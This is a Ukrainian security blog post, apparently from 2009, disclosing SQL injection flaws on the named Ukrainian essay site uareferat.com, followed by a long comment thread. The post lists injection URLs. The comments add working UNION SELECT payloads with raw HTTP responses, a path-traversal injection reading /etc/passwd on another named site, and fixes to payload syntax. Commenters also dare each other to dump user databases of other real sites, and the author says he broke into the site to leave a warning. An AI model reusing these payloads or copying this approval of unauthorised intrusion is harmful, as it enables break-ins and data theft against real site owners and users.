Уразливості на uareferat.com

19:13 09.12.2009

14.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

09.12.2009

SQL DB Structure Extraction:

http://uareferat.com/rus/details/13220/

http://uareferat.com/rus/referaty/’/

http://uareferat.com/rus/’/

http://uareferat.com/rus/referaty/1/-1/

http://uareferat.com/abton/

SQL Injection:

http://uareferat.com/rus/details/’+benchmark(10000,md5(now()))+’/

http://uareferat.com/rus/referaty/1′+version()-’1/

Вивело п’ятий розділ сайта, значить MySQL 5.x.

http://uareferat.com/rus/referaty/1?+benchmark(10000,md5(now()))-’1/

http://uareferat.com/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені.


18 відповідей на “Уразливості на uareferat.com”

  1. Alex каже:

    ты наверно хакер…))

    GET /files.php?id=&refdll=-1+union+select+version()– HTTP/1.1

    HOST: uareferat.com

    HTTP/1.1 302 Found

    Server: nginx/0.6.32

    Date: Sun, 15 Feb 2009 16:06:24 GMT

    Content-Type: text/html

    Connection: keep-alive

    X-Powered-By: PHP/5.2.6

    Set-Cookie: PHPSESSID=5fa5a89d39c1c12ede81ea27ddeedca6; path=/

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Location: down.php?id=&fid=369056

    Content-Length: 0

    GET /down.php?id=&fid=369056 HTTP/1.1

    HOST: uareferat.com

    HTTP/1.1 200 OK

    Server: nginx/0.6.32

    Date: Sun, 15 Feb 2009 16:06:42 GMT

    Content-Type: text/html

    Connection: keep-alive

    X-Powered-By: PHP/5.2.6

    Set-Cookie: PHPSESSID=0d1070002c4ba0267c795f2b505901d1; path=/

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Content-Disposition: attachment; filename=5.0.67-log

    Content-Length: 0

    вывод тут:

    Content-Disposition: attachment; filename=5.0.67-log

    кому лень с http-заголовками и неткатом работать - просто заходите по ссылке типа http://uareferat.com/files.php?id=&refdll=-1+union+select+version()–

    и обратите внимание на имя скачиваемого файла.

    тут mysql 5, поэтому легко можна написать парсер для дампа information_schema.columns чтобы узнать все колонки и таблицы в бд.

    а тут вообще весело:

    http://referat.com.ua/download.php?id=-1′%20UNION%20SELECT%201,’../../../../../../../../etc/passwd’/*

    Курсы CyberBionic Systematics делают чудеса…

  2. MustLive каже:

    ты наверно хакер…))

    Alex

    Естественно я хакер, раз при беглом взгляде на сайт нашёл 6 уязвимостей. Плюс после написания данного поста, когда я искал админку на данном сайте, я нашёл ещё одну седьмую уязвимость. И в этом движке явно хватает дыр, о чём свидетельствует и то, что с каждым взглядом на сайт я нахожу новые уязвимости, и найденная тобою SQL Injection.

    Учитывая, что ты также нашёл одну дыру на этом сайте, ты явно тоже стремишься стать хакером :-) . Но тебе есть куда ещё работать, т.к. приведенный тобою код нерабочий (надеюсь ты его сам писал, а не скопировал у другого человека и ненароком добавил ошибку). Сама уязвимость рабочая, но код (SQL запрос) нерабочий - ты неверный символ комментария использовал ;-) . Данный символ комментария используется в других СУБД, а в MySQL применяются два других символа - в данном случае нужно вместо — использовать #, чтобы атака сработала.

    Так что с такими ляпами курсам CyberBionic Systematics до чудес далеко :-) . Учи матчасть и тогда может станешь хакером. В данном случае, Алекс, почитай руководства по SQL SQL Injection в разных СУБД, о которых я писал в прошом году - в них поданы нюансы различных СУБД.

    Кстати об упомянутых тобою курсах. Это такая у тебя скрытая реклама? Реклама в комментариях у меня на сайте не приветствуется, так что не стоит этим заниматься.

    тут mysql 5

    Я обратил внимание, что там MySQL 5. Так что добраться до имен таблиц и полей в них можно будет без проблем. И вытянуть из них данные. Это хорошо, что не третья версия MySQL, но даже на ней возможны различные атаки.

  3. MustLive каже:

    HOST: uareferat.com

    Не нужно было тебе приводить заголовки. Ты же не статью пишешь, и если уж хотел уточнить, то привёл бы лишь один заголовок Content-Disposition. Проще было упомянуть, что ответ из БД выводится в заголовке сервера (а также, как ты и сказал, в имени скачиваемого файла в браузере).

    Этого мне вполе было бы достаточно, и любой читатель моего сайта кому интересно, сам бы с этим разобрался. А использовать ли nc, telnet или другой инструмент для работы с http-заголовками (например, плагин к браузеру) - это личное дело каждого хакера. Кому как удобно - главное, чтобы был доступ к заголовкам.

    Касательно опубликованных тобою деталей уязвимостей, то ты немного контрастируешь с тем, что я привёл в посте только анонс найденных уязвимостей. Детали тебе стоило написать админам сайта (в данном случае обоих сайтов - uareferat.com и referat.com.ua), и лишь потом публиковать детали - чтобы дать людям время на исправление (так как это я обычно делаю). Не стоило с этим спешить, т.к. это несёт риски для обоих сайтов.

    Замечу, что на данном сайте используется движок (который также используется на многих сайтах в Уанете). И соответственно эти уязвимости имеют место в данном движке. О чём я сегодня напишу отдельный пост.

    а тут вообще весело:

    Сама уязвимость хорошая (и атакующий код рабочий). Но доступ к /etc/passwd используется в большинстве случаев лишь как пример, и больших угроз данная утечка информации не несёт. А вот доступ к произвольным файлам на сервере - это серьёзная уязвимость ;-) . В данном случае в passwd утекают логины в системе и некоторая другая информация (в том числе реальные имена пользователей системы).

    Об уязвимости на referat.com.ua тебе также стоило сообщить его админам. Только что я бегло глянул на этот сайт и нашёл ещё 3 дыры, поэтому со временем я напишу об этом в новостях (где упомяну и о твоей дыре). И сообщу об уязвимостях админам сайта.

  4. Rett Pop каже:

    Насколько я понимаю, дырки уже позарывали. Оперативненько они… :)

    >У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.

    Почти год прошел…

  5. MustLive каже:

    Почти год прошел…

    Только сейчас дошла очередь до этого сайта - как видно из новостей, сейчас публикую информацию о дырах найденных мною в марте 2008. Я публикую информацию в хронологическом порядке, и учитывая, что я пощу одну дыру в день (одна или несколько дыр на одном сайте), а за день я могу найти дыры на множестве сайтов, то и накапливается их много, что приводит к подобным задержкам.

    Периодически я делаю исключения, и публикую не в хронологическом порядке, например, когда дыра связана с недавно опубликованной, или она просто актуальная, или же если ранее она была по некоторым причинам пропущена. А также в случае проведения проектов, таких как MOSEB, MoBiC или Дни багов. Подобные исключения позволяют более оперативнее публиковать найденные узявимости :-) .

    Насколько я понимаю, дырки уже позарывали.

    Нет, не закрыли. Все упомянутые дыры (а также я нашёл ещё новые, о чём напишу в отдельном посте) до сих пор не исправлены. Админу данного сайта я отправил три дня назад письмо и дыры так и не были исправлены. Надеюсь, что после того как я сегодня взломал его сайт ;-) и разместил на нём сообщение о наличии уязвимостей, он всё же займётся безопасностью сайта.

    Т.к. дыры на сайте имеют место долгое время (с момента запуска сайта), а также в самом движке Abton. И все сайты на данном движке также уязвимы.

  6. Alex каже:

    нууу по поводу твоих посетителей - спорный вопрос) я не думаю что твой сайт посещают ребята которые рубят дампы датингов/шопов/etc, не говорю уже про билинги, платёжки, etc…)) а я вообще сайт случаено нашел хотя искал инфу вообще не из этой оперы) да и вообще, я в реале в киеве незнаю ниодного человека который активно смог бы юзать скули в ms, mysql, oracle, postgre и при этом знал 2-3 языка… кругом одни ламеры) все кто чему то научился - все свалили в мск, либо на кардинг перешли)

    не интересно писать все скули вподряд) показал бы ты скуль на egold/paypal - был бы респект, а того что ты выкладываешь и на античате хватает)

  7. MustLive каже:

    нууу по поводу твоих посетителей - спорный вопрос)

    Естественно сайт читают разные люди, с разным уровнем подготовки. Как пользователи, веб девелоперы и админы сайтов, так и хакеры. Периодически и хакеры читают мой сайт, пишут письма и комментарии, как ты к примеру ;-) . О том, что хакеры (и всякие скрипт кидисы) читают в той или иной степени мой сайт я также знаю по ежедневным попыткам атак на сайт (ясное дело безуспешным).

    Так что и профессионалы читают мой веб проект. А материалы я публикую для всех групп посетителей, поэтому каждый найдёт полезное для себя.

    В любом случае я стараюсь давать людям возможность поработать своей головой. Поэтому и сказал тебе, что не нужно постить все заголовки. Чтобы люди могли сами разобраться с хедерами и с данной конкретной уязвимостью. Т.к. подобная дополнительная работа при чтении материалов на сайте пойдёт только на пользу.

  8. MustLive каже:

    все кто чему то научился - все свалили в мск, либо на кардинг перешли)

    Я не свалил никуда. Хотя мне многократно предлагали свалить в те же США. Так что пока я жив, для Украины ещё не всё потеряно ;-) .

    Ну и не все украинские хакеры занимаюся криминалом (не верь всему, что пишут журналисты) - я к примеру им не занимаюсь :-) . А то, что в Украине, и в Киеве в частности, есть толковые люди (помимо меня), то я это знаю по своим друзьям. Хакерством из них никто не занимается, но зато активно работают в области программирования и/или веб девелопинга (чем я сам также занимаюсь, и только с начала 2005 я начал увлекаться темой веб безопасности).

    Хотя давным давно, что меня, что моих друзей периодически заинтересовывали разные хакерские направления, типа взлом программ (даже пару лет назад “тряхнул стариной” и написал крак для одной программы, которым поделился со своим преподом в университете и КПИшниками). Та что не все ламеры, нужно просто знать места :-) (где есть и другие категории людей).

    я в реале в киеве незнаю ниодного человека который активно смог бы юзать скули в ms, mysql, oracle, postgre и при этом знал 2-3 языка

    Я тоже лично не знаком (ни в Киеве, ни в Украине) с людьми, чтобы знали нюансы различных СУБД и умели проводить SQLi атаки. Сам же я хакал сайты использующие MSSQL, MySQL и Oracle (а также доводилось исследовать сайты на DB2, вот только сайты с Postgres SQL не попадались). И естественно изучаю особенности различных СУБД для самообразования. А также публикую информацию на сайте, чтобы другие также могли улучшать свои знания (чем ты мог бы заняться). В результате своих исследований в области БД я и создаю такие инструменты как SQL Injection ASCII Encoder.

    не интересно писать все скули вподряд) показал бы ты скуль на egold/paypal - был бы респект, а того что ты выкладываешь и на античате хватает)

    Античат не читаю, так что не скажу чего на нём хватает (подобные ресурсы мне не интересны). А вот наличие SQLi на egold/paypal весьма маловероятно, зато вполне возможно наличие других дыр. То что на сайтах платёжных систем есть уязвимости, я уже писал на примере webmoney.ru.

  9. Alex каже:

    да ну нах)) это WP парсит два тире как одно)))
    и не надо рассказывать какие комментарии в MySQL…)))
    есть там как раз и такой тип) если документацию почитаешь узнаешь, что существует 3 типа комментариев:
    /*comment*/
    – comment (два тире)
    #comment
    после двух тире ставить пробел надо)
    http://uareferat.com/files.php?id=&refdll=-1+union+select+version()–+1
    возможно щас WP интерпретирует снова всё не так))

    и мой тебе совет - меньше льсти себе, потому что на каждый … найдется больший))
    попробуй снять дамп gala.net и описать взлом тут))) база юзеров в Sybase)
    Adaptive Server Enterprise/11.9.2.6/1287/P/SWR 10032 ROLLUP/Linux Intel/Linux 2.2.5-15 i586/OPT/Mon Mar 11 23:46:34 2002

    если получиться то поучи синтаксис mysql на примере work.ua (если ты кончено такой перец что найдешь там скуль :lol: )

    что мне не нравиться в whitehat’ах - так это то, что они фигню какую-то находят, а до конца взлом не доводят и хвалят себя как только могут))
    я в websecurity пораньше чем ты) думаю тебе ещё стоит поизучать синтаксис Transact-SQL и PL/SQL =)

    не обижайся, просто мне очень не понравилось что ты попробовал указать на мои ляпы которых нету))) я ж версию в заголовках не из неба взял? )))

  10. MustLive каже:

    да ну нах)) это WP парсит два тире как одно)))

    Alex, WP то парсит, но ты, во-первых, должен был это учитывать при посте у меня на сайте (т.к. знал же какой у меня движок), а во вторых, что гораздо более важно, учитывать особенности данного третьего варианта комментариев в MySQL.

    И если бы ты учёл эти особенности, то не использовал бы этот вариант, и тогда проблемы этой бы не возникло ;-) .

    и не надо рассказывать какие комментарии в MySQL…)))
    есть там как раз и такой тип)

    Я хорошо знаю какие типы комментариев существуют в MySQL (3 типа), а также в других СУБД, и знаю их особенности. И тебе бы стоило учитывать эти особенности. Третий вариант отличен от используемых в других СУБД (за счёт пробела) и поддерживается не всеми версиями MySQL (поэтому я стараюсь его не использовать и порекомендовал тебе использовать два других). Я понимаю, что ты знаешь обо всех типах комментариев в MySQL, но ты явно не учитываешь их особенности, что видно из твоих примеров запросов.

    /*comment*/
    – comment (два тире)
    #comment
    после двух тире ставить пробел надо)

    Вот именно, что после двух тире (на самом деле дефисов) нужно пробел ставить. А в твоём первом примере этого нет, поэтому я обратил твоё внимание на это. Ясное дело, что ты запрос на сайт правильный сделал и он у тебя заработал, но пример опубликованный тобою у меня в комментариях уже не являлся рабочим.

    http://uareferat.com/files.php?id=&refdll=-1+union+select+version()–+1
    возможно щас WP интерпретирует снова всё не так))

    Естественно, WP опять заменил два дефиса на один (на этот раз ты хоть завершающий пробел не забыл написать). Написал бы другой символ комментария - # или /* - и код бы был рабочим ;-) . Если знаешь особенности WP, то зачем же тупить. Ты же хакер, прояви гибкость, чтобы опубликованные тобою примеры были рабочими.

  11. MustLive каже:

    и мой тебе совет - меньше льсти себе, потому что

    Стараюсь себе не льстить, Alex, это тебе показалось ;-) .

    попробуй снять дамп gala.net и описать взлом тут

    Взломом сайтов не занимаюсь. Делаю только добрые хаки. А снимание дампа gala.net к ним не относится :D .

    Кстати дыры на gala.net я находил, так что проблемы с безопасностью у них есть. Как и у work.com.ua (другой домена work.ua).

    если получиться то поучи синтаксис mysql на примере work.ua

    С синтаксисом MySQL хорошо знаком (хотя есть куда улучшать свои знания), т.к. работаю с даной СУБД с 2002 года. Можешь ознакомиться с моим MustLive/BPG MySQL Perl/CGI Client.

    что мне не нравиться в whitehat’ах - так это то, что они фигню какую-то находят, а до конца взлом не доводят и хвалят себя как только могут))

    То, что whitehat’ы взломы обычно до конца не доводят - это характерно для них (знаю, т.к. сам whitehat). Обычно они только находят дыры и на этот ограничиваются (сообщают ли админам о дырах, или нет, это зависит от конкретного хакера). Взломами обычно же занимаются blackhat хакеры. А то, что они хвалят себя как только могут - то тут ты верно подметил, часто с таким сталкиваюсь.

    Но whitehat’ы бывают разные, к примеру я регуляно практикую добрые хаки. В данном конкретном случае я похакал uareferat.com, чтобы сообщить админам в новостях у них на сайте о проблемах с безопасностью. Так что в отличии от тебя я похакал uareferat.com :-) . Из этого следует совет для тебя: меньше слов, а больше дела 8-) .

    я в websecurity пораньше чем ты)

    Всё может быть :-) . Я ни в коем случае не занижаю твой стаж в websecurity (просто помни, что эффективность годов стажа м.б. разная, можно заниматься эпизодически, а можно ежедневно). Я websecurity занимаюсь с марта 2005. Хотя впервые с этим столкнулся как веб разработчик ещё летом 2001 года, когда на мой сайт была совершена первая хакерская атака - мои весёлые друзья решили меня порадовать таким образом :-D .

    думаю тебе ещё стоит поизучать синтаксис Transact-SQL и PL/SQL =)

    С данными синтаксисами не знаком, и особо не работал с СУБД поддерживающими их. Не доводилось сталкиваться с SQLi уязвимостями, где бы понадобилось знать синтаксис Transact-SQL или PL/SQL. Т.е. знания SQL у меня практические. А вот с Access и MySQL мне много раз доводилось работать как разработчику, поэтому их синтаксис SQL я знаю более детально (а для других СУБД я использую свои общие знания SQL и специфику конкретных СУБД).

    не обижайся, просто мне очень не понравилось что ты попробовал указать на мои ляпы которых нету)))

    Никаких обид ;-) . А ляпы небольшие были, о чём я писал выше. А т.к. ты мне запостил этакую скрытую рекламу курсов, то я потому жестковато на это ответил, что мол есть куда улучшать эти курсы. На самом деле конфликтов тут никаких нет :-) .

  12. Rett Pop каже:

    На счет лести… Но ты ж общаешься с богом! (http://websecurity.com.ua/642/) Что это как не лесть себе?!

    ЗЫЖ: шутка :)

  13. MustLive каже:

    Rett Pop, шутки шутками :-) , но касательно твоего комментария скажу следующее.

    В коментариях к вышеупомянутому посту я общался с человеком с ником God. Почему он так себя назвал - это вопрос к нему (захотелось человеку себя так назвать, захотелось повыпендриваться). Не раз встречал людей которые использовали слово “god” как ник или часть ника. Тут ты верно подметил, это лесть себе ;-) .

    Этот персонаж запостил SEO-спам ко мне на сайт (что является обычной ситуацией). Но т.к. текст был тематическим, я его спам не удалил, а лишь убрал ссылку, чтобы SEO-состовляющей не было. Кто занимается SEO, тот может использовать мой SEO метод. В итоге, я нашёл на его сайте уязвимость и ему в емайле об этом написал, но на безопасность своего сайта от забил (т.е. его интерес к безопасности был показной). Так что я рекомендую не себе льстить, а дыры на своих сайтах исправлять.

  14. РУДИМЕНТ каже:

    “да и вообще, я в реале в киеве незнаю ниодного человека который активно смог бы юзать скули в ms, mysql, oracle, postgre и при этом знал 2-3 языка… кругом одни ламеры”
    Бугаа а ты по хочу весь Киев знаешь? )))) пипец ржач, ты сам научись хоть грамотно писать, потом будешь тут блестать, да и вообще спецы не бегают и не орут об этом и тем более не общаются с “мега крутыми хакерами” как ты, так что расслабься звезда )))
    Вообщем тут собственно и отвечать не стояло.

  15. Dementor каже:

    Доречі цей інжект там уже давно, я його ще рік назад юзав :)

  16. Dementor каже:

    Ше із сайтів з рефератами бачив інжект на ukrreferat.com , може навіть досі там є.

  17. MustLive каже:

    РУДИМЕНТ

    Не стоит брать близко к сердцу комментарии Alex-а, особенно комментарии с ошибками :-) . Он конечно ещё та звезда, широко известная в киевском андерграунде, но тем не менее, в его постах есть тоже интересные вещи.

    Так что не сорьтесь, ребята. Лучше потратье свою энергию на улучшение своего хакерского скила ;-) .

  18. MustLive каже:

    Dementor

    Так, наведені мною SQLi на сайті були вже давно - я їх знайшов ще 31.03.2008. Але окрім них є ще інші інжекти на uareferat.com (в тому числі інжект Алекса, який до сих пір не виправлений). До того ж в розробників цього сайта є й інші сайти зі своїми дірками (в тому числі й SQLi) :-) .

    Ше із сайтів з рефератами бачив інжект на ukrreferat.com

    Дірки на ukrreferat.com звісно є, як я щойно швидко глянув. А от серед сайтів від розробників uareferat.com дірок вистачає на referat.com.ua, в тому числі й SQL Injection.

Leave a Reply

You must be logged in to post a comment.